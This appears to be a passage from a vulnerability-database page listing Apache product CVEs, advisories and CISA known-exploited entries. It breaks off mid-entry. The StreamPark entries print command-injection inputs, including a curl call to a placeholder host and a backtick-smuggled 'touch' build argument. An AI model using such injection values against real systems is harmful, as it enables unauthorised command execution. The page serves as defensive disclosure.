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Do you want an email whenever new security vulnerabilities are reported in any Apache product?

Products by Apache Sorted by Most Security Vulnerabilities since 2018

Apache HTTP Server251 vulnerabilities

Apache Tomcat117 vulnerabilities
JEE Compliant Servlet Container

Apache AirFlow73 vulnerabilities

Apache Traffic Server53 vulnerabilities

Apache OpenOffice47 vulnerabilities

Apache Superset44 vulnerabilities

Apache Cxf37 vulnerabilities

Apache Ofbiz30 vulnerabilities

Apache Solr29 vulnerabilities
Search engine written in java

Apache Nifi28 vulnerabilities

Apache Inlong25 vulnerabilities

Apache Struts24 vulnerabilities

Apache Tika22 vulnerabilities

Apache Jspwiki21 vulnerabilities

Apache Activemq20 vulnerabilities

Apache Dubbo19 vulnerabilities

Apache Hadoop18 vulnerabilities

Apache Spark17 vulnerabilities

Apache Kylin15 vulnerabilities

Apache Camel14 vulnerabilities

Apache Dolphinscheduler14 vulnerabilities

Apache Log4j14 vulnerabilities

Apache Shiro13 vulnerabilities

Apache Plusar13 vulnerabilities

Apache Zookeeper12 vulnerabilities

Apache Guacamole12 vulnerabilities

Apache Hive11 vulnerabilities

Apache Kafka11 vulnerabilities

Apache Iotdb11 vulnerabilities

Apache Commons Compress11 vulnerabilities

Apache Karaf11 vulnerabilities

Apache Linkis11 vulnerabilities

Apache Fineract11 vulnerabilities

Apache Geode11 vulnerabilities

Apache Ozone10 vulnerabilities

Apache Tapestry10 vulnerabilities

Apache James10 vulnerabilities

Apache Shenyu9 vulnerabilities

Apache Subversion9 vulnerabilities

Apache Tomee9 vulnerabilities

Apache Spamassassin9 vulnerabilities

Apache Activemq Artemis8 vulnerabilities

Apache Archiva8 vulnerabilities

Apache Batik8 vulnerabilities

Apache Syncope8 vulnerabilities

Apache Couchdb8 vulnerabilities

Apache Qpid Broker J8 vulnerabilities

Apache Storm8 vulnerabilities

Apache Ambari7 vulnerabilities

Apache Thrift7 vulnerabilities

Apache Openmeetings7 vulnerabilities

Apache Pdfbox7 vulnerabilities

Apache Streampark7 vulnerabilities

Apache Cassandra7 vulnerabilities

Apache Pluto7 vulnerabilities

Apache Zeppelin7 vulnerabilities

Apache Druid7 vulnerabilities

Apache Mesos7 vulnerabilities

Apache Portable Runtime6 vulnerabilities

Apache Xml Security For C6 vulnerabilities

Apache Traffic Control6 vulnerabilities

Apache Ignite6 vulnerabilities

Apache Apisix6 vulnerabilities

Apache Apr Util6 vulnerabilities

Apache Avro6 vulnerabilities

Apache Bookkeeper6 vulnerabilities

Apache Commons Jxpath6 vulnerabilities

Apache Cxf Fediz6 vulnerabilities

Apache Drill6 vulnerabilities

Apache Roller5 vulnerabilities

Apache Httpclient5 vulnerabilities

Apache Axis5 vulnerabilities

Apache Cloudstack5 vulnerabilities

Apache Xerces C5 vulnerabilities

Apache Commons Fileupload5 vulnerabilities

Apache Ranger5 vulnerabilities

Apache Sling Cms4 vulnerabilities

Apache Allura4 vulnerabilities

Apache Ant4 vulnerabilities

Apache Any234 vulnerabilities

Apache Netbeans4 vulnerabilities

Apache Olingo4 vulnerabilities

Apache Jena4 vulnerabilities

Apache Impala4 vulnerabilities

Apache Qpid4 vulnerabilities

Apache Sshd4 vulnerabilities

Apache Openoffice Org4 vulnerabilities

Apache Groovy4 vulnerabilities

Apache Streampipes3 vulnerabilities

Apache Nuttx3 vulnerabilities

Apache Shardingsphere3 vulnerabilities

Apache Rocketmq3 vulnerabilities

Apache Atlas3 vulnerabilities

Apache Mina3 vulnerabilities

Apache Brpc3 vulnerabilities

Apache Commons Beanutils3 vulnerabilities

Apache Servicecomb3 vulnerabilities

Apache Jmeter3 vulnerabilities

Recent Apache Security Advisories

Advisory Title Published
2.4.62 2 Vulnerabilities Fixed in Apache HTTP Server 2.4.62 July 17, 2024
2.4.61 Vulnerability Fixed in Apache HTTP Server 2.4.61 July 16, 2024
2.4.60 8 Vulnerabilities Fixed in Apache HTTP Server 2.4.60 July 15, 2024
2.4.59 3 Vulnerabilities Fixed in Apache HTTP Server 2.4.59 April 4, 2024
2.4.58 4 Vulnerabilities Fixed in Apache HTTP Server 2.4.58 October 19, 2023
2.4.56 2 Vulnerabilities Fixed in Apache HTTP Server 2.4.56 March 7, 2023
2.4.55 3 Vulnerabilities Fixed in Apache HTTP Server 2.4.55 January 17, 2023
2.4.54 8 Vulnerabilities Fixed in Apache HTTP Server 2.4.54 June 8, 2022
2.4.53 4 Vulnerabilities Fixed in Apache HTTP Server 2.4.53 March 14, 2022
2.4.52 2 Vulnerabilities Fixed in Apache HTTP Server 2.4.52 December 20, 2021

Known Exploited Apache Vulnerabilities

The following Apache vulnerabilities have recently been marked by CISA as Known to be Exploited by threat actors.

Title Description Added
Apache Flink Improper Access Control Vulnerability Apache Flink contains an improper access control vulnerability that allows an attacker to read any file on the local filesystem of the JobManager through its REST interface. CVE-2020-17519 May 23, 2024
Apache Superset Insecure Default Initialization of Resource Vulnerability Apache Superset contains an insecure default initialization of a resource vulnerability that allows an attacker to authenticate and access unauthorized resources on installations that have not altered the default configured SECRET_KEY according to installation instructions. CVE-2023-27524 January 8, 2024
Apache ActiveMQ Deserialization of Untrusted Data Vulnerability Apache ActiveMQ contains a deserialization of untrusted data vulnerability that may allow a remote attacker with network access to a broker to run shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. CVE-2023-46604 November 2, 2023
Apache RocketMQ Command Execution Vulnerability Several components of Apache RocketMQ, including NameServer, Broker, and Controller, are exposed to the extranet and lack permission verification. An attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as or achieve the same effect by forging the RocketMQ protocol content. CVE-2023-33246 September 6, 2023
Apache Tomcat Remote Code Execution Vulnerability Apache Tomcat contains an unspecified vulnerability that allows for remote code execution if JmxRemoteLifecycleListener is used and an attacker can reach Java Management Extension (JMX) ports. This CVE exists because this listener wasn't updated for consistency with the Oracle patched issues for CVE-2016-3427 which affected credential types. CVE-2016-8735 May 12, 2023
Apache Log4j2 Deserialization of Untrusted Data Vulnerability Apache Log4j2 contains a deserialization of untrusted data vulnerability due to the incomplete fix of CVE-2021-44228, where the Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations. CVE-2021-45046 May 1, 2023
Apache Spark Command Injection Vulnerability Apache Spark contains a command injection vulnerability via Spark User Interface (UI) when Access Control Lists (ACLs) are enabled. CVE-2022-33891 March 7, 2023
Apache CouchDB Insecure Default Initialization of Resource Vulnerability Apache CouchDB contains an insecure default initialization of resource vulnerability which can allow an attacker to escalate to administrative privileges. CVE-2022-24706 August 25, 2022
Apache APISIX Authentication Bypass Vulnerability Apache APISIX contains an authentication bypass vulnerability that allows for remote code execution. CVE-2022-24112 August 25, 2022
Apache Tomcat Remote Code Execution Vulnerability When running Apache Tomcat, it is possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. CVE-2017-12617 March 25, 2022
Apache Kylin OS Command Injection Vulnerability Apache Kylin contains an OS command injection vulnerability which could permit an attacker to perform remote code execution. CVE-2020-1956 March 25, 2022
Apache Tomcat on Windows Remote Code Execution Vulnerability When running Apache Tomcat on Windows with HTTP PUTs enabled, it is possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. CVE-2017-12615 March 25, 2022
Apache Struts Improper Input Validation Vulnerability Apache Struts allows remote attackers to execute arbitrary Object-Graph Navigation Language (OGNL) expressions. CVE-2013-2251 March 25, 2022
Apache Tomcat Improper Privilege Management Vulnerability Apache Tomcat treats Apache JServ Protocol (AJP) connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited. CVE-2020-1938 March 3, 2022
Apache Struts 1 Improper Input Validation Vulnerability The Struts 1 plugin in Apache Struts might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage. CVE-2017-9791 February 10, 2022
Apache ActiveMQ Improper Input Validation Vulnerability The Fileserver web application in Apache ActiveMQ allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request CVE-2016-3088 February 10, 2022
Apache Struts 1 ActionForm Denial-of-Service Vulnerability ActionForm in Apache Struts versions before 1.2.9 with BeanUtils 1.7 contains a vulnerability which allows for denial-of-service. CVE-2006-1547 January 21, 2022
Apache Struts 2 Improper Input Validation Vulnerability The ExceptionDelegator component in Apache Struts 2 before contains an improper input validation vulnerability which allows for remote code execution. CVE-2012-0391 January 21, 2022
Apache Airflow Command Injection A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow. CVE-2020-11978 January 18, 2022
Apache Airflow's Experimental API Authentication Bypass The previous default setting for Airflow's Experimental API was to allow all API requests without authentication. CVE-2020-13927 January 18, 2022

By the Year

In 2024 there have been 53 vulnerabilities in Apache with an average score of 6.9 out of ten. Last year Apache had 261 security vulnerabilities published. Right now, Apache is on track to have less security vulnerabilities in 2024 than it did last year. Last year, the average CVE base score was greater by 0.57

Year Vulnerabilities Average Score
2024 53 6.88
2023 261 7.44
2022 224 7.64
2021 201 7.52
2020 158 7.59
2019 157 7.29
2018 142 7.25

It may take a day or so for new Apache vulnerabilities to show up in the stats or in the list of recent security vulnerabilties. Additionally vulnerabilities may be tagged under a different product or component name.

Recent Apache Security Vulnerabilities

An improper input validation of the p2c parameter in the Apache CXF JOSE code before 4.0.5, 3.6.4 and 3.5.9 

CVE-2024-32007 7.5 - High - July 19, 2024

An improper input validation of the p2c parameter in the Apache CXF JOSE code before 4.0.5, 3.6.4 and 3.5.9 allows an attacker to perform a denial of service attack by specifying a large value for this parameter in a token. 

A partial fix for  CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers

CVE-2024-40725 - July 18, 2024

A partial fix for  CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted. Users are recommended to upgrade to version 2.4.62, which fixes this issue.

Exposure of Resource to Wrong Sphere

SSRF in Apache HTTP Server on Windows with mod_rewrite in server/vhost context

CVE-2024-40898 - July 18, 2024

SSRF in Apache HTTP Server on Windows with mod_rewrite in server/vhost context, allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests. Users are recommended to upgrade to version 2.4.62 which fixes this issue. 


Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache StreamPipes in user self-registration

CVE-2024-30471 3.7 - Low - July 17, 2024

Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache StreamPipes in user self-registration. This allows an attacker to potentially request the creation of multiple accounts with the same email address until the email address is registered, creating many identical users and corrupting StreamPipe's user management. This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.


Server-Side Request Forgery (SSRF) vulnerability in Apache StreamPipes during installation process of pipeline elements

CVE-2024-31979 4.3 - Medium - July 17, 2024

Server-Side Request Forgery (SSRF) vulnerability in Apache StreamPipes during installation process of pipeline elements. Previously, StreamPipes allowed users to configure custom endpoints from which to install additional pipeline elements. These endpoints were not properly validated, allowing an attacker to get StreamPipes to send an HTTP GET request to an arbitrary address. This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.


In streampark, the project module integrates Maven's compilation capabilities

CVE-2023-52291 4.7 - Medium - July 17, 2024

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args  < operator causes command injection. e.g : < (curl  http://xxx.com ) will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4,  The "<" operator will blocked?

Command Injection

In streampark, the project module integrates Maven's compilation capabilities

CVE-2024-29737 4.7 - Medium - July 17, 2024

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.4 Background info: Log in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the "Build Argument". Note that there is no verification and interception of the special character "`". As a result, you will find that this injection command will be successfully executed after executing the build. In the latest version, the special symbol ` is intercepted.

Command Injection

Apache Airflow versions before 2.9.3 have a vulnerability

CVE-2024-39863 5.4 - Medium - July 17, 2024

Apache Airflow versions before 2.9.3 have a vulnerability that allows an authenticated attacker to inject a malicious link when installing a provider. Users are recommended to upgrade to version 2.9.3, which fixes this issue.


Apache Airflow 2.4.0, and versions before 2.9.3, has a vulnerability

CVE-2024-39877 8.8 - High - July 17, 2024

Apache Airflow 2.4.0, and versions before 2.9.3, has a vulnerability that allows authenticated DAG authors to craft a doc_md parameter in a way that could execute arbitrary code in the scheduler context, which should be forbidden according to the Airflow Security model. Users should upgrade to version 2.9.3 or later which has removed the vulnerability.

Code Injection

In Apache Linkis <=1.5.0

CVE-2023-49566 8.8 - High - July 15, 2024

In Apache Linkis <=1.5.0, due to the lack of effective filtering of parameters, an attacker configuring malicious db2 parameters in the DataSource Manager Module will result in jndi injection. Therefore, the parameters in the DB2 URL should be blacklisted.  This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis <=1.5.0 will be affected. We recommend users upgrade the version of Linkis to version 1.6.0.

Marshaling, Unmarshaling

In Apache Linkis <= 1.5.0

CVE-2023-46801 8.8 - High - July 15, 2024

In Apache Linkis <= 1.5.0, data source management module, when adding Mysql data source, exists remote code execution vulnerability for java version < 1.8.0_241. The deserialization vulnerability exploited through jrmp can inject malicious files into the server and execute them. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out.  We recommend that users upgrade the java version to >= 1.8.0_241. Or users upgrade Linkis to version 1.6.0.

Marshaling, Unmarshaling

In Apache Linkis =1.4.0

CVE-2023-41916 6.5 - Medium - July 15, 2024

In Apache Linkis =1.4.0, due to the lack of effective filtering of parameters, an attacker configuring malicious Mysql JDBC parameters in the DataSource Manager Module will trigger arbitrary file reading. Therefore, the parameters in the Mysql JDBC URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis = 1.4.0 will be affected.  We recommend users upgrade the version of Linkis to version 1.5.0.

Files or Directories Accessible to External Parties

Apache NiFi 1.10.0 through 1.26.0 and 2.0.0-M1 through 2.0.0-M3 support a description field in the Parameter Context configuration

CVE-2024-37389 5.4 - Medium - July 08, 2024

Apache NiFi 1.10.0 through 1.26.0 and 2.0.0-M1 through 2.0.0-M3 support a description field in the Parameter Context configuration that is vulnerable to cross-site scripting. An authenticated user, authorized to configure a Parameter Context, can enter arbitrary JavaScript code, which the client browser will execute within the session context of the authenticated user. Upgrading to Apache NiFi 1.27.0 or 2.0.0-M4 is the recommended mitigation.


The CloudStack integration API service

CVE-2024-39864 9.8 - Critical - July 05, 2024

The CloudStack integration API service allows running its unauthenticated API server (usually on port 8096 when configured and enabled via integration.api.port global setting) for internal portal integrations and for testing purposes. By default, the integration API service port is disabled and is considered disabled when integration.api.port is set to 0 or negative. Due to an improper initialisation logic, the integration API service would listen on a random port when its port value is set to 0 (default value). An attacker that can access the CloudStack management network could scan and find the randomised integration API service port and exploit it to perform unauthorised administrative actions and perform remote code execution on CloudStack managed hosts and result in complete compromise of the confidentiality, integrity, and availability of CloudStack managed infrastructure. Users are recommended to restrict the network access on the CloudStack management server hosts to only essential ports. Users are recommended to upgrade to version, or later, which addresses this issue.

Code Injection

The CloudStack cluster service runs on unauthenticated port (default 9090)

CVE-2024-38346 9.8 - Critical - July 05, 2024

The CloudStack cluster service runs on unauthenticated port (default 9090) that can be misused to run arbitrary commands on targeted hypervisors and CloudStack management server hosts. Some of these commands were found to have command injection vulnerabilities that can result in arbitrary code execution via agents on the hosts that may run as a privileged user. An attacker that can reach the cluster service on the unauthenticated port (default 9090), can exploit this to perform remote code execution on CloudStack managed hosts and result in complete compromise of the confidentiality, integrity, and availability of CloudStack managed infrastructure. Users are recommended to restrict the network access to the cluster service port (default 9090) on a CloudStack management server host to only its peer CloudStack management server hosts. Users are recommended to upgrade to version, or later, which addresses this issue.

Code Injection

A regression in the core of Apache HTTP Server 2.4.60 ignores some use of the legacy content-type based configuration of handlers

CVE-2024-39884 - July 04, 2024

A regression in the core of Apache HTTP Server 2.4.60 ignores some use of the legacy content-type based configuration of handlers.   "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted. Users are recommended to upgrade to version 2.4.61, which fixes this issue.

A regression in the core of Apache HTTP Server 2.4.60 ignores some use of the legacy content-type based configuration of handlers

CVE-2024-39884 - July 04, 2024

A regression in the core of Apache HTTP Server 2.4.60 ignores some use of the legacy content-type based configuration of handlers.   "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted. Users are recommended to upgrade to version 2.4.61, which fixes this issue.

Serving WebSocket protocol upgrades over a HTTP/2 connection could result in a Null Pointer dereference

CVE-2024-36387 - July 01, 2024

Serving WebSocket protocol upgrades over a HTTP/2 connection could result in a Null Pointer dereference, leading to a crash of the server process, degrading performance.

NULL Pointer Dereference

SSRF in Apache HTTP Server on Windows

CVE-2024-38472 - July 01, 2024

SSRF in Apache HTTP Server on Windows allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests or content Users are recommended to upgrade to version 2.4.60 which fixes this issue.  Note: Existing configurations that access UNC paths will have to configure new directive "UNCList" to allow access during request processing.

Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier

CVE-2024-38473 - July 01, 2024

Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests. Users are recommended to upgrade to version 2.4.60, which fixes this issue.

Output Sanitization

Potential SSRF in mod_rewrite in Apache HTTP Server 2.4.59 and earlier

CVE-2024-39573 - July 01, 2024

Potential SSRF in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to cause unsafe RewriteRules to unexpectedly setup URL's to be handled by mod_proxy. Users are recommended to upgrade to version 2.4.60, which fixes this issue.

Improper Input Validation

Substitution encoding issue in mod_rewrite in Apache HTTP Server 2.4.59 and earlier

CVE-2024-38474 - July 01, 2024

Substitution encoding issue in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows attacker to execute scripts in directories permitted by the configuration but not directly reachable by any URL or source disclosure of scripts meant to only to be executed as CGI. Users are recommended to upgrade to version 2.4.60, which fixes this issue. Some RewriteRules that capture and substitute unsafely will now fail unless rewrite flag "UnsafeAllow3F" is specified.

Output Sanitization

Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations

CVE-2024-38475 - July 01, 2024

Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected.  Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.

Output Sanitization

Vulnerability in core of Apache HTTP Server 2.4.59 and earlier are vulnerably to information disclosure, SSRF or local script execution

CVE-2024-38476 - July 01, 2024

Vulnerability in core of Apache HTTP Server 2.4.59 and earlier are vulnerably to information disclosure, SSRF or local script execution via backend applications whose response headers are malicious or exploitable. Users are recommended to upgrade to version 2.4.60, which fixes this issue.

Inclusion of Functionality from Untrusted Control Sphere

null pointer dereference in mod_proxy in Apache HTTP Server 2.4.59 and earlier

CVE-2024-38477 - July 01, 2024

null pointer dereference in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows an attacker to crash the server via a malicious request. Users are recommended to upgrade to version 2.4.60, which fixes this issue.

NULL Pointer Dereference

HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response

CVE-2024-27316 7.5 - High - April 04, 2024

HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.

Allocation of Resources Without Limits or Throttling

Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses

CVE-2023-38709 - April 04, 2024

Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses. This issue affects Apache HTTP Server: through 2.4.58.

HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker

CVE-2024-24795 - April 04, 2024

HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker that can inject malicious response headers into backend applications to cause an HTTP desynchronization attack. Users are recommended to upgrade to version 2.4.59, which fixes this issue.

HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response

CVE-2024-27316 7.5 - High - April 04, 2024

HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.

Allocation of Resources Without Limits or Throttling

Possible path traversal in Apache OFBiz allowing file inclusion

CVE-2024-23946 5.3 - Medium - February 29, 2024

Possible path traversal in Apache OFBiz allowing file inclusion. Users are recommended to upgrade to version 18.12.12, that fixes the issue.

Directory traversal

Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress.This issue affects Apache Commons Compress:

CVE-2024-26308 5.5 - Medium - February 19, 2024

Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress.This issue affects Apache Commons Compress: from 1.21 before 1.26. Users are recommended to upgrade to version 1.26, which fixes the issue.

Allocation of Resources Without Limits or Throttling

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache Commons Compress.This issue affects Apache Commons Compress:

CVE-2024-25710 5.5 - Medium - February 19, 2024

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache Commons Compress.This issue affects Apache Commons Compress: from 1.3 through 1.25.0. Users are recommended to upgrade to version 1.26.0 which fixes the issue.

Infinite Loop

Insufficiently Protected Credentials vulnerability in Apache Solr

CVE-2023-50291 7.5 - High - February 09, 2024

Insufficiently Protected Credentials vulnerability in Apache Solr. This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.3.0. One of the two endpoints that publishes the Solr process' Java system properties, /admin/info/properties, was only setup to hide system properties that had "password" contained in the name. There are a number of sensitive system properties, such as "basicauth" and "aws.secretKey" do not contain "password", thus their values were published via the "/admin/info/properties" endpoint. This endpoint populates the list of System Properties on the home screen of the Solr Admin page, making the exposed credentials visible in the UI. This /admin/info/properties endpoint is protected under the "config-read" permission. Therefore, Solr Clouds with Authorization enabled will only be vulnerable through logged-in users that have the "config-read" permission. Users are recommended to upgrade to version 9.3.0 or 8.11.3, which fixes the issue. A single option now controls hiding Java system property for all endpoints, "-Dsolr.hiddenSysProps". By default all known sensitive properties are hidden (including "-Dbasicauth"), as well as any property with a name containing "secret" or "password". Users who cannot upgrade can also use the following Java system property to fix the issue:   '-Dsolr.redaction.system.pattern=.*(password|secret|basicauth).*'

Insufficiently Protected Credentials

Incorrect Permission Assignment for Critical Resource, Improper Control of Dynamically-Managed Code Resources vulnerability in Apache Solr

CVE-2023-50292 7.5 - High - February 09, 2024

Incorrect Permission Assignment for Critical Resource, Improper Control of Dynamically-Managed Code Resources vulnerability in Apache Solr. This issue affects Apache Solr: from 8.10.0 through 8.11.2, from 9.0.0 before 9.3.0. The Schema Designer was introduced to allow users to more easily configure and test new Schemas and configSets. However, when the feature was created, the "trust" (authentication) of these configSets was not considered. External library loading is only available to configSets that are "trusted" (created by authenticated users), thus non-authenticated users are unable to perform Remote Code Execution. Since the Schema Designer loaded configSets without taking their "trust" into account, configSets that were created by unauthenticated users were allowed to load external libraries when used in the Schema Designer. Users are recommended to upgrade to version 9.3.0, which fixes the issue.

Incorrect Permission Assignment for Critical Resource

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr.This issue affects Apache Solr:

CVE-2023-50298 7.5 - High - February 09, 2024

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. Solr Streaming Expressions allows users to extract data from other Solr Clouds, using a "zkHost" parameter. When original SolrCloud is setup to use ZooKeeper credentials and ACLs, they will be sent to whatever "zkHost" the user provides. An attacker could setup a server to mock ZooKeeper, that accepts ZooKeeper requests with credentials and ACLs and extracts the sensitive information, then send a streaming expression using the mock server's address in "zkHost". Streaming Expressions are exposed via the "/streaming" handler, with "read" permissions. Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue. From these versions on, only zkHost values that have the same server address (regardless of chroot), will use the given ZooKeeper credentials and ACLs when connecting.

Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality

CVE-2023-50386 8.8 - High - February 09, 2024

Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. In the affected versions, Solr ConfigSets accepted Java jar and class files to be uploaded through the ConfigSets API. When backing up Solr Collections, these configSet files would be saved to disk when using the LocalFileSystemRepository (the default for backups). If the backup was saved to a directory that Solr uses in its ClassPath/ClassLoaders, then the jar and class files would be available to use with any ConfigSet, trusted or untrusted. When Solr is run in a secure way (Authorization enabled), as is strongly suggested, this vulnerability is limited to extending the Backup permissions with the ability to add libraries. Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue. In these versions, the following protections have been added: * Users are no longer able to upload files to a configSet that could be executed via a Java ClassLoader. * The Backup API restricts saving backups to directories that are used in the ClassLoader.

Improper Control of Dynamically-Managed Code Resources

Request smuggling vulnerability in HTTP server in Apache bRPC 0.9.5~1.7.0 on all platforms allows attacker to smuggle request

CVE-2024-23452 7.5 - High - February 08, 2024

Request smuggling vulnerability in HTTP server in Apache bRPC 0.9.5~1.7.0 on all platforms allows attacker to smuggle request. Vulnerability Cause Description: The http_parser does not comply with the RFC-7230 HTTP 1.1 specification. Attack scenario: If a message is received with both a Transfer-Encoding and a Content-Length header field, such a message might indicate an attempt to perform request smuggling or response splitting. One particular attack scenario is that a bRPC made http server on the backend receiving requests in one persistent connection from frontend server that uses TE to parse request with the logic that 'chunk' is contained in the TE field. in that case an attacker can smuggle a request into the connection to the backend server.  Solution: You can choose one solution from below: 1. Upgrade bRPC to version 1.8.0, which fixes this issue. Download link: https://github.com/apache/brpc/releases/tag/1.8.0 2. Apply this patch:  https://github.com/apache/brpc/pull/2518

HTTP Request Smuggling

Improper Authentication vulnerability in Apache Ozone

CVE-2023-39196 5.3 - Medium - February 07, 2024

Improper Authentication vulnerability in Apache Ozone. The vulnerability allows an attacker to download metadata internal to the Storage Container Manager service without proper authentication. The attacker is not allowed to do any modification within the Ozone Storage Container Manager service using this vulnerability. The accessible metadata does not contain sensitive information that can be used to exploit the system later on, and the accessible data does not make it possible to gain access to actual user data within Ozone. This issue affects Apache Ozone: 1.2.0 and subsequent releases up until 1.3.0. Users are recommended to upgrade to version 1.4.0, which fixes the issue.


Observable timing discrepancy vulnerability in Apache Pulsar SASL Authentication Provider can allow an attacker to forge a SASL Role Token

CVE-2023-51437 7.4 - High - February 07, 2024

Observable timing discrepancy vulnerability in Apache Pulsar SASL Authentication Provider can allow an attacker to forge a SASL Role Token that will pass signature verification. Users are recommended to upgrade to version 2.11.3, 3.0.2, or 3.1.1 which fixes the issue. Users should also consider updating the configured secret in the `saslJaasServerRoleTokenSignerSecretPath` file. Any component matching an above version running the SASL Authentication Provider is affected. That includes the Pulsar Broker, Proxy, Websocket Proxy, or Function Worker. 2.11 Pulsar users should upgrade to at least 2.11.3. 3.0 Pulsar users should upgrade to at least 3.0.2. 3.1 Pulsar users should upgrade to at least 3.1.1. Any users running Pulsar 2.8, 2.9, 2.10, and earlier should upgrade to one of the above patched versions. For additional details on this attack vector, please refer to https://codahale.com/a-lesson-in-timing-attacks/ .

Side Channel Attack

Malicious code execution

CVE-2024-23673 7.5 - High - February 06, 2024

Malicious code execution via path traversal in Apache Software Foundation Apache Sling Servlets Resolver.This issue affects all version of Apache Sling Servlets Resolver before 2.11.0. However, whether a system is vulnerable to this attack depends on the exact configuration of the system. If the system is vulnerable, a user with write access to the repository might be able to trick the Sling Servlet Resolver to load a previously uploaded script.  Users are recommended to upgrade to version 2.11.0, which fixes this issue. It is recommended to upgrade, regardless of whether your system configuration currently allows this attack or not.

Directory traversal

Server-Side Request Forgery (SSRF) vulnerability in Apache ServiceComb Service-Center

CVE-2023-44313 7.5 - High - January 31, 2024

Server-Side Request Forgery (SSRF) vulnerability in Apache ServiceComb Service-Center. Attackers can obtain sensitive server information through specially crafted requests.This issue affects Apache ServiceComb before 2.1.0(include). Users are recommended to upgrade to version 2.2.0, which fixes the issue.


Exposure of Sensitive Information to an Unauthorized Actor in Apache ServiceComb Service-Center.This issue affects Apache ServiceComb Service-Center before 2.1.0 (include)

CVE-2023-44312 7.5 - High - January 31, 2024

Exposure of Sensitive Information to an Unauthorized Actor in Apache ServiceComb Service-Center.This issue affects Apache ServiceComb Service-Center before 2.1.0 (include). Users are recommended to upgrade to version 2.2.0, which fixes the issue.

In Apache Kylin version 2.0.0 to 4.0.3, there is a Server Config web interface

